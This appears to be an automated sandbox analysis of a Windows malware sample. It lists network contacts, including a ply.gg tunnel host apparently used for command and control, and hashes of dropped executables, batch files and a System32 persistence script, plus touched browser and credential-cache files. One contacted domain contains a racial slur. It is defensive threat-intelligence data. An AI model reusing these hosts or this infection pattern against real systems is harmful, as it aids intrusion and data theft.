US 8.8.8.8:53 ocsp.int-r1.certainly.com udp
US 151.101.3.3:80 ocsp.int-r1.certainly.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.135.232:443 discord.com tcp
US 8.8.8.8:53 media.discordapp.net udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 162.159.130.232:443 media.discordapp.net tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 150.171.27.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 pattern-cyber-report.glitch.me udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 api.edgeoffer.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 8.8.8.8:53 copilot.microsoft.com udp
US 204.79.197.239:80 edge.microsoft.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
GB 95.100.153.132:443 copilot.microsoft.com tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.180.3:80 o.pki.goog tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
IE 94.245.104.56:443 api.edgeoffer.microsoft.com tcp
US 8.8.8.8:53 niggafart.com udp
US 8.8.8.8:53 niggafart.com udp
US 104.21.66.212:443 niggafart.com udp
US 104.21.66.212:443 niggafart.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
US 104.21.66.212:443 niggafart.com udp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 95.100.153.157:443 www.bing.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 looking-brings.gl.at.ply.gg udp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 150.171.27.11:443 edge.microsoft.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 edge.microsoft.com udp
US 8.8.8.8:53 edge.microsoft.com udp
US 150.171.28.11:443 edge.microsoft.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 8.8.8.8:53 edgeassetservice.azureedge.net udp
US 13.107.253.64:443 edgeassetservice.azureedge.net tcp
N/A 224.0.0.251:5353 udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.180.3:80 c.pki.goog tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 8.8.8.8:53 edge-consumer-static.azureedge.net udp
US 13.107.246.64:443 edge-consumer-static.azureedge.net tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 104.21.66.212:443 niggafart.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 151.101.66.59:443 pattern-cyber-report.glitch.me tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
US 147.185.221.26:65381 looking-brings.gl.at.ply.gg tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp
GB 142.250.179.228:443 www.google.com tcp

Files

memory/620-0-0x00007FFB47E93000-0x00007FFB47E95000-memory.dmp

memory/620-1-0x0000000000820000-0x0000000000838000-memory.dmp

memory/620-3-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe

MD5 12a225de8199d2a31f049a6f300d8cfa
SHA1 24819a452cf1db15167a52b12f258d27baacbd6e
SHA256 1399d955881d9db34cbe261c117818a7933a1cc7c8cdabcff8fc22c880053801
SHA512 3e321ac6e35b83e0645611721354a03358da7dde8bc42f761e258f87fa2ae8a33c3778aa48b10e0ead87331eded7240b7134f9c05333a823a53258f7a52cac32

C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe

MD5 7091469b8f2213255ba3c2870a60c7eb
SHA1 17e501e4900bf5dacc5cb0424db87d2ce7a89880
SHA256 d63b09f1a44ed10ff2e6aa558ab494ad561066fff13de330eae87e6749a0e3d7
SHA512 f67a4244cf2f4c6fdc728441d85e4e3d6cea3fd28fcc2b21aefc385257d3ad4eb177ff58acb07621b6fb6d4c331b7df80f5a9bd7a53c5d54bb91f000138223b8

memory/2700-26-0x00000000006B0000-0x00000000006BE000-memory.dmp

memory/2716-30-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

memory/2716-29-0x0000000000F70000-0x0000000000F8A000-memory.dmp

memory/2700-32-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

memory/620-33-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Launch.bat

MD5 41bded52aa489cdea31a174f89bca818
SHA1 da072fb11e72d2762f96d0f901d7ef7bca17218d
SHA256 2172bb0729d91bcf777bbdd0c42dae9c71de0f1251d165655f551673bf622d59
SHA512 d0fa53492e783e627186d96dcf3ffcecc10f8895bd42a16f4946c34de6e4ec2bc156bab0e070ec0ebf9492f394d11d4c7929df1b57ca59cb6e11a566de3a6dd9

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1xnc5ty.wik.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4408-44-0x000002138B290000-0x000002138B2B2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 a43e653ffb5ab07940f4bdd9cc8fade4
SHA1 af43d04e3427f111b22dc891c5c7ee8a10ac4123
SHA256 c4c53abb13e99475aebfbe9fec7a8fead81c14c80d9dcc2b81375304f3a683fe
SHA512 62a97e95e1f19a8d4302847110dae44f469877eed6aa8ea22345c6eb25ee220e7d310fa0b7ec5df42356815421c0af7c46a0f1fee8933cc446641800eda6cd1b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd827d87d4f068bc1a89b62eb8098c50
SHA1 b4af1c6abfeca3b3a5a32829a94aed17b51febfd
SHA256 1eed4317be345afde65ad49f9699615789a275edc3613a3be3de57bbf4e85950
SHA512 2a53f125052f422c410ae1a1d9d1a83b437e28dc0161c6a72b111ce339be23a3400c14c6b67b88b887e90880da60ed632a7edf3d733315c143a8dc16f5bd11da

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3072fa0040b347c3941144486bf30c6f
SHA1 e6dc84a5bd882198583653592f17af1bf8cbfc68
SHA256 da8b533f81b342503c109e46b081b5c5296fdad5481f93fe5cc648e49ca6238e
SHA512 62df0eed621fe8ec340887a03d26b125429025c14ddcdfef82cb78ce1c9c6110c1d51ff0e423754d7966b6251363bf92833970eaf67707f8dd62e1549a79536c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 47605a4dda32c9dff09a9ca441417339
SHA1 4f68c895c35b0dc36257fc8251e70b968c560b62
SHA256 e6254c2bc9846a76a4567ab91b6eae76e937307ff9301b65d577ffe6e15fe40a
SHA512 b6823b6e794a2fe3e4c4ecfb3f0d61a54821de7feb4f9e3e7fd463e7fbb5e6848f59865b487dafebeac431e4f4db81ef56836d94cac67da39852c566ed34a885

memory/2716-84-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

memory/2716-85-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

memory/2700-86-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

memory/2716-87-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat

MD5 fcd4bbb460a569c24197ddfda0e40834
SHA1 043d6dc12c4a36aba9fb7675826bbec17a2b864a
SHA256 d3f3a9b603b494ca1eb4013e3a6e1960143c22fa2f1d75771b6b2286653952d6
SHA512 f166df50c95b05ba97c4fe8f97c34f9e5f749aa296cd84f6e3b6244774ff9d0cf52f1a3c6d04a3891a64f6d19436553e9b14ca4fff3ba89c02b4f5ca47ebc45a

memory/2700-93-0x00007FFB47E90000-0x00007FFB48951000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 34f595487e6bfd1d11c7de88ee50356a
SHA1 4caad088c15766cc0fa1f42009260e9a02f953bb
SHA256 0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA512 10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

C:\Users\Admin\AppData\Local\Temp\hig.bat

MD5 0bef633cf86b1400fc172bc980679f4a
SHA1 2b0c618413f107eb4d242cb094b254e110d74fac
SHA256 8dc1f76281d8f0b54db59f1c16642577d4d7f26644e0b50dbd2359c2bbc6c4bb
SHA512 da9a1e3dc6bcce6bc9eb72d06224aed4ce382107c517de81d31c1c5562109dd67bdf2d3fe513345577a7a37eee10674a16d1eda99c6759d1a628f41a19d991c2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d8cb3e9459807e35f02130fad3f9860d
SHA1 5af7f32cb8a30e850892b15e9164030a041f4bd6
SHA256 2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68
SHA512 045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

C:\Windows\System32\Rasauq\$77RasauqBroker.bat

MD5 2cd713001f754501db9352be199b068d
SHA1 7b78d00055ffd0343dc85e18fb7dd3b878a91a80
SHA256 9a6aedf35728aab3b7f79ab7161521553372ecafa8cde175b93f9207378273da
SHA512 52de353b6bbea37415a260d60cd4ae86d205471c826723156980fa87d054df407b2b2a03963efd183aec69b461da0f611ee57dbaf5caa4ff671c77b81fd63796

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 322574cb879ec3bfb0c338232c6c4433
SHA1 b5bdb44f0c7d62d00175f389569f59809434415b
SHA256 b3e928ac387ca1f088335af81fd45ea373088d5cd9d5d5bfadd03f00a01fcb54
SHA512 9aa9f6103c6b9f6e32f82274bdec3f3873031fd6c30d87bc8f34b29ec00bdbd3b37600985d91c85364eb2716bb6a93a4f396e67c2f29b704efd34ff63dc10064

C:\Windows\System32\Recovery\ReAgent.xml

MD5 44b2da39ceb2c183d5dcd43aa128c2dd
SHA1 502723d48caf7bb6e50867685378b28e84999d8a
SHA256 894ee2b19608d10df4bf8b8f5bbcf40ce38c09c1f4c5543b6164f40c04bb270d
SHA512 17744dcaddb49f17fe67dc3a579f4df2b6c2b196776330b71edfc58b37d1f8ae477bfb718d2f23401b78b789b7f984b19341f50fbecfba1bc101f596dee40604

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 25605e2e0f4a4791e51d21be63c24fba
SHA1 31b97382fbff0286aeded845b45c35b5ac1f1b6c
SHA256 c49262f4f9506263f09407edd6fd2ef2fd10d9a0e47a00e2ed0f8ca087aaecc1
SHA512 c3934e8199fa41f3f76f15765e033abc94cd6ce135100b809c7b2f086c2be89ca6e719175cc09a95b133b883667d92b146237c8e255ac3c1124cc5cad5ba6640

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3a6bad9528f8e23fb5c77fbd81fa28e8
SHA1 f127317c3bc6407f536c0f0600dcbcf1aabfba36
SHA256 986366767de5873f1b170a63f2a33ce05132d1afd90c8f5017afbca8ef1beb05
SHA512 846002154a0ece6f3e9feda6f115d3161dc21b3789525dd62ae1d9188495171293efdbe7be4710666dd8a15e66b557315b5a02918a741ed1d5f3ff0c515b98e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a9451a6b9669d49bd90704dff21beb85
SHA1 5f93d2dec01a31e04fc90c28eb1c5ca62c6fff80
SHA256 b2ff191507379930b97a212f869c3774c20b274e8fc9fcc96da5c154fb0e3056
SHA512 06634cb578f6ce8d721e6306004082073fc224b91ceea37ef870df87b12b2d5f59e7d08b20b520787a1d13f3edbbb004197bf70f180f86dd7f401a5ad289ccb5

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 f7114b322f301a74fffb1281e015fa47
SHA1 1399807ecc4dec1540c317f49188a8261b0d1621
SHA256 46d66810fd116702899d3a2afce3c68f808c4c1adf26d1b8bc951d4eab737bfa
SHA512 2dabe30c17e1c1e42aa7bc4e2981c55b14702b61cd9a95104b85a5c658b8935ef0ea4c2cec07b77ac0e298aa47ccbcfe8c3459b4cc0a00927cda88079c98976f

C:\Windows\system32\drivers\etc\hosts

MD5 917ba5206776c19510c610309127a375
SHA1 313a1606d1c43fc3b4ca876443fd55ddc9bad7aa
SHA256 2c7629b07c9164751435e0114e321afd298af3ed1c8d079a5c29d132072a4322
SHA512 33e9f9bbaaeb02fb95239fad20c98bf59ad6d0b89403d2ccce77a40423ccb32ccfe9dfe7f6eb903f2bcb96bf96a3ab5d0dbe88f63ee58dbded46b41c409f559d

\??\pipe\crashpad_1488_SYAFXSXYECZQKNHM

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 60d40d2b37759323c10800b75df359b8
SHA1 f5890e7d8fc1976fe036fea293832d2e9968c05c
SHA256 c3a2f26d5aef8b5ed1d23b59ed6fce952b48194bed69e108a48f78aec72126e0
SHA512 0c339563594cc9f930a64903281589886308d4412ee267e976520a58d86b2c339d7b2320e1b3fd6fbf81f092ff1735f0710c669af2986ea5b63d2c1e0a6df902

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006f

MD5 eef911348f13105f1501b48929ef9224
SHA1 e8f3fd90ae05a940444a80a6c84cab08245891e3
SHA256 5524773f6bb8874ae1ff858bf25ca03e86f90e3a6854448e7f85726b89271da8
SHA512 ead59bd08d3f11236caf5236ac17fc8af996ec2aa1322d547e26376f7fcc8109db2417b16267cd5f55480b6263fd70fbdabcc67f99c1b1f6385a20ca85f17814

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 110e632b2a11978956a648e984bb8d2f
SHA1 1561790eed5905b04ff10c453b0f9f9ada94d9ea
SHA256 ad7977466fa4fcadc7377e39ed1d670f214693ed213affee58e6e8a71717d926
SHA512 b1363d5415a05690aa9dc34caed0321b63630e3dbe377d788bdf816e0f6104c04fae34097b9058b9d2bb09e2604625a21854e2ab1431f207a79dd36e0ba6ddde

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006d

MD5 ab7fc8ab7d76d79285b17b4d9860cbf0
SHA1 b5833d99bda07236d2ad950fe452cf595fbc3c20
SHA256 99933f6af1e17aadc2472a0d537dc4cd9ea565ca56ef5081eb00c806b351083b
SHA512 200083c436e414fe92512d317cb8434d4fb099ed4075b22e171feb4b379b9b72bbd5a926b5d8040bc0d27d54bb4df5841c509a0a95bb70becfbc5f7d7f5f2daf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 dbd2a87f8d468e66359254d224b89aee
SHA1 f91e12952a982869661918ef24409bae1a72b8c2
SHA256 c29ec852f0e2881b5325eb2ac0f4996d4f03f749b5e2faafc1f5cca6f779aecc
SHA512 a039f13f63a8a3a0862a163bd95aa3a01100b80a7eeaf621adbc0b9c991bbd6c3fad88bca66b27939bc91b912472cdd9014b6dce96e3a3331bf8b7c5f9f7bb46

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

MD5 20d4b8fa017a12a108c87f540836e250
SHA1 1ac617fac131262b6d3ce1f52f5907e31d5f6f00
SHA256 6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d
SHA512 507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 1a416c84ec604373dbfd5e58d4eb0cdc
SHA1 9db2d1c121c1bac8f72c7746799eeaa1f60817ae
SHA256 28407ff150250031eb0650ca1c0504607e11b9b0fc56c759ae5dff1c47b1a071
SHA512 a14b5e679206cee9dd19d9d2ae19170f814b7ee0f2163028562ddcee8165c7dca36ea2b106da9e97fdec6c9a33d6e0c301b15af0a4f14f6912286ff79daad200

C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

MD5 16ef691ee178b21b9613aa04b8e5814b
SHA1 8fe48215758049b96e722c7d89db3e810d4df86b
SHA256 b8020561ea8a3b2726b09db5bb192dce5489e2ac0f9e5296d436f4fea25e7b5a
SHA512 27d904b7ac85be002721322fb36863662b2b64b2ee5491a021efac8f84d23ab28b37929bff45917fb82803a15e636eae77e9d4eac265f061545ca9dc2d441bce

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

MD5 e6d8fd99fa90aff99a5c991c3d4c20be
SHA1 be0e65ee36bb18709ae4204128ac2d0c3dbae475
SHA256 e9f13e8d7aeb72ee9100b86bbd9c95ef234962beedd5ae391e5f1480984225c3
SHA512 6bfa026925b1c506d95c98fce3f573aa2f2fa08ea62439ee3e3cc9bfdaefa4d7f31172ada34158f5dcd70c1a54e4fd1d794ad030f7eda37f8da8ae839373048a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

MD5 40e2018187b61af5be8caf035fb72882
SHA1 72a0b7bcb454b6b727bf90da35879b3e9a70621e
SHA256 b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5
SHA512 a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

MD5 99914b932bd37a50b983c5e7c90ae93b
SHA1 bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1

MD5 a5b3a7e7f7fc44d586d1883d62997e6d
SHA1 d90622365014bbb90950bb2c7b99940d2d09bfec
SHA256 0a9fd1ccc8c526bd9196d0db29dd18237fb56d748ddb9c58a4d6d2b3957b4012
SHA512 463f9842b62e8438549f55b8e0e2a4a1391e254d1e7c498d9af74d16e74752c797ec079313e55cdc70a41b3c8a820b7e42868959a93cb89448b6be10bab13029